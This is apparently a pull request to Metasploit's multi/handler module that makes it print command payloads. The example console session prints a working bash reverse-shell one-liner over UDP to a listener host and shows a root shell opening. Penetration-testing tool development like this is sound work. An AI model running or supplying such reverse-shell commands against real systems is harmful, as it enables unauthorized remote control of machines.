### PR TITLE
Print cmd payloads in exploit/multi/handler [WIP] 

### DIFF
--- a/modules/exploits/multi/handler.rb
+++ b/modules/exploits/multi/handler.rb
@@ -53,6 +53,11 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
+    if datastore['PAYLOAD'].starts_with? "cmd/"
+        print_good "Run these commands on the target"
+        print_line generate_payload.raw
+        print_line
+    end
     if datastore['DisablePayloadHandler']
       print_error "DisablePayloadHandler is enabled, so there is nothing to do. Exiting!"
       return


### PR DESCRIPTION
When using cmd payloads (i.e. cmd/unix/reverse_bash_udp ), the handler will print the command the command to run on the target in addition to starting the listener.

example:
msfconsole -q
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload cmd/unix/reverse_bash_udp 
payload => cmd/unix/reverse_bash_udp
msf6 exploit(multi/handler) > set lhost wlo1
lhost => 192.168.1.100
msf6 exploit(multi/handler) > set lport 4444
lport => 4444
msf6 exploit(multi/handler) > exploit
[*] Started reverse UDP handler on 192.168.1.100:4444 
[+] Run these commands on the target
bash -c '0<&29-;exec 29<>/dev/udp/192.168.1.100/4444;echo>&29;sh <&29 >&29 2>&29'

[*] Command shell session 1 opened (0.0.0.0:4444 -> 192.168.1.101:50850) at 2022-11-29 16:00:52 -1000

whoami
root

